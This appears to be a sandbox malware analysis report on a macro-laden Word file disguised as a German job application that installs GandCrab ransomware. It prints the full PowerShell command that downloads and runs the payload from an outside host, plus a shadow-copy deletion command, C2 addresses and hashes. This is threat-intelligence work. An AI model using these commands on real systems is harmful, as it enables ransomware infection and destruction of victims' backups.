File name: Bewerbung_Lena_Schwarz.doc
Full analysis: https://app.any.run/tasks/e72d8266-16ba-4cef-a7c5-98c779c4604a
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous ransomware families. Ransomware is malware that demands payment from the victim in order to restore access to encrypted files. If the user does not cooperate, the files are lost forever.

Analysis date: December 18, 2018, 08:03:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
ransomware
gandcrab
trojan
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5: E9CE01FB0F565A95B8BF66A0FA32D11B
SHA1: 5B9B714AF457F7813BAAAD07B85C2BB8D2AE51F2
SHA256: A75EF9B9FE8F637EEF6348F2F3AAB7F635FC0B64F383F49B06D84B54121A7A17
SSDEEP: 1536:SYzOtUwRhX/i2nR3BxHlqKOfLK8eps7B7gClU6ragbn7JJJUJJJPjGYAGDKJJJJo:F0UqX/icFBBYfWJsdLragb7JJJUJJJPL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3348)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3280)
    • GandCrab keys found

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3280)
    • Writes file to Word startup folder

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3776)
    • Deletes shadow copies

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Renames files like Ransomware

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Actions looks like stealing of personal data

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Dropped file may contain instructions of ransomware

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Connects to CnC server

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Changes settings of System certificates

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
  • SUSPICIOUS

    • Creates files in the program directory

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Creates files in the user directory

      • powershell.exe (PID: 3776)
      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3776)
    • Creates files like Ransomware instruction

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Reads the cookies of Mozilla Firefox

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Reads Internet Cache Settings

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
    • Adds / modifies Windows certificates

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3280)
    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 3280)
      • powershell.exe (PID: 3776)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3280)
    • Dropped object may contain TOR URL's

      • ctftvkegqqyvcgmqcrbbttznbxrqj.exe (PID: 2448)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XMP

Description: -
Creator: User
Subject: -
Title: -

XML

ModifyDate: 2018:12:18 05:50:00Z
CreateDate: 2018:12:18 05:42:00Z
RevisionNumber: 2
LastModifiedBy: User
Keywords: -
AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 1
LinksUpToDate: No
Company: -
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 1
Words: -
Pages: 1
TotalEditTime: -
Template: summerjam

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1511
ZipCompressedSize: 404
ZipCRC: 0x23cbfb46
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
All screenshots are available in the full report
Total processes: 50
Monitored processes: 8
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Graph nodes: winword.exe (no specs), cmd.exe (no specs), powershell.exe, ctftvkegqqyvcgmqcrbbttznbxrqj.exe (#GANDCRAB), wmic.exe (no specs), explorer.exe (no specs), Shell Security Editor (no specs), notepad.exe (no specs)

Process information

PID: 3280
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bewerbung_Lena_Schwarz.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000

PID: 3348
CMD: cmd /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://topwarenhub.top/summerjam.exe','%temp%\ctftvkegqqyvcgmqcrbbttznbxrqj.exe');start %temp%\ctftvkegqqyvcgmqcrbbttznbxrqj.exe
Path: C:\Windows\system32\cmd.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3776
CMD: powErshEll (New-Object System.Net.WebClient).DownloadFile('http://topwarenhub.top/summerjam.exe','C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe');start C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2448
CMD: "C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe"
Path: C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe
Parent process: powershell.exe
User: admin
Integrity Level: MEDIUM

PID: 3968
CMD: "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path: C:\Windows\system32\wbem\wmic.exe
Parent process: ctftvkegqqyvcgmqcrbbttznbxrqj.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: WMI Commandline Utility
Exit code: 2147749908
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3532
CMD: "C:\Windows\explorer.exe"
Path: C:\Windows\explorer.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3264
CMD: C:\Windows\system32\DllHost.exe /Processid:{4D111E08-CBF7-4F12-A926-2C7920AF52FC}
Path: C:\Windows\system32\DllHost.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: COM Surrogate
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2376
CMD: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\AADIBVT-DECRYPT.txt
Path: C:\Windows\system32\NOTEPAD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Notepad
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 512
Read events: 1 205
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 1
Suspicious files: 277
Text files: 225
Unknown types: 18

Dropped files

PID | Process | Filename | Type
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8B7D.tmp.cvr | -
  MD5: -
  SHA256: -
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0617B4C.png | -
  MD5: -
  SHA256: -
3776 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E3U0PEQ3PAC177DB7JPO.temp | -
  MD5: -
  SHA256: -
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | -
  MD5: -
  SHA256: -
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C4CDEA1A-446A-445F-BA69-DAB98D7F756F}.tmp | binary
  MD5: 32A214AA6F5C0C005379DB477169E1CD
  SHA256: 9FBA5E06E6594CFCD596C498F0283AF4B06BBE25353CBD53EDCD561BAFBA6A4A
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4E237B48-06FC-47CF-9681-DDB7C049A5F3}.tmp | smt
  MD5: 0AA5DB1388373EF0B3425E65C7C2A01F
  SHA256: C70EAED267AA52C30D6209DBCC91602CC754887C8C53034405CC1EBEF04FA402
3776 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary
  MD5: 901ECDF767744E6BB59CB023757886E3
  SHA256: 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\AADIBVT-DECRYPT.txt | text
  MD5: F12313658A868B2113A23F91C95CBBC2
  SHA256: F3806A6010FABFEEF4D6A4C6F6E2EB688FAA347F3B0A55CAE9EDD2D35E2594C4
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$werbung_Lena_Schwarz.doc | pgc
  MD5: 14DD569DA6EB4450EFAD661DE8E4C881
  SHA256: A90D5AF739E54AF3DDFB86EBF226B52BD15DD214170FED547A100D0CCD8221A5
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\Users\admin\AppData\AADIBVT-DECRYPT.txt | text
  MD5: F12313658A868B2113A23F91C95CBBC2
  SHA256: F3806A6010FABFEEF4D6A4C6F6E2EB688FAA347F3B0A55CAE9EDD2D35E2594C4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 77
TCP/UDP connections: 133
DNS requests: 68
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | - | 212.59.186.61:80 | http://www.hotelweisshorn.com/ | CH | - | - | malicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 301 | 83.138.82.107:80 | http://www.swisswellness.com/ | DE | - | - | whitelisted
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | - | 78.46.77.98:80 | http://www.2mmotorsport.biz/ | DE | - | - | suspicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 302 | 192.185.159.253:80 | http://www.pizcam.com/ | US | - | - | malicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 301 | 83.166.138.7:80 | http://www.whitepod.com/ | CH | - | - | whitelisted
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 301 | 104.24.22.22:80 | http://www.belvedere-locarno.com/ | US | - | - | shared
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | POST | - | 217.26.53.161:80 | http://www.haargenau.biz/static/graphic/daessees.bmp | CH | - | - | malicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | - | 217.26.53.37:80 | http://www.hrk-ramoz.com/ | CH | - | - | malicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 301 | 80.244.187.247:80 | http://www.hotelfarinet.com/ | GB | - | - | suspicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 200 | 136.243.13.215:80 | http://www.holzbock.biz/ | DE | html | 1.78 Kb | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 78.46.77.98:443 | www.2mmotorsport.biz | Hetzner Online GmbH | DE | suspicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 192.185.159.253:80 | www.pizcam.com | CyrusOne LLC | US | malicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 74.220.215.73:80 | www.bizziniinfissi.com | Unified Layer | US | malicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 138.201.162.99:80 | www.fliptray.biz | Hetzner Online GmbH | DE | malicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 83.138.82.107:80 | www.swisswellness.com | hostNET Medien GmbH | DE | suspicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 212.59.186.61:80 | www.hotelweisshorn.com | green.ch AG | CH | malicious
3776 | powershell.exe | 94.96.135.211:80 | topwarenhub.top | Saudi Telecom Company JSC | SA | suspicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 192.185.159.253:443 | www.pizcam.com | CyrusOne LLC | US | malicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 136.243.13.215:80 | www.holzbock.biz | Hetzner Online GmbH | DE | suspicious
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 83.166.138.7:443 | www.whitepod.com | Infomaniak Network SA | CH | malicious

DNS requests

Domain | IP | Reputation
topwarenhub.top | 94.96.135.211, 93.152.165.187, 109.175.6.103, 213.6.58.250, 178.164.181.105, 94.190.187.35, 84.238.172.65, 89.190.74.198, 86.61.75.99, 62.141.244.144 | malicious
www.2mmotorsport.biz | 78.46.77.98 | unknown
www.haargenau.biz | 217.26.53.161 | unknown
www.bizziniinfissi.com | 74.220.215.73 | malicious
dns.msftncsi.com | 131.107.255.255 | shared
www.holzbock.biz | 136.243.13.215 | unknown
www.fliptray.biz | 138.201.162.99 | malicious
www.pizcam.com | 192.185.159.253 | unknown
www.swisswellness.com | 83.138.82.107 | whitelisted
www.hotelweisshorn.com | 212.59.186.61 | unknown

Threats

PID | Process | Class | Message
- | - | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile
3776 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
3776 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3776 | powershell.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain
3776 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
3776 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3776 | powershell.exe | Misc activity | ET INFO Possible EXE Download From Suspicious TLD
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | A Network Trojan was detected | ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | A Network Trojan was detected | MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | A Network Trojan was detected | MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
No debug info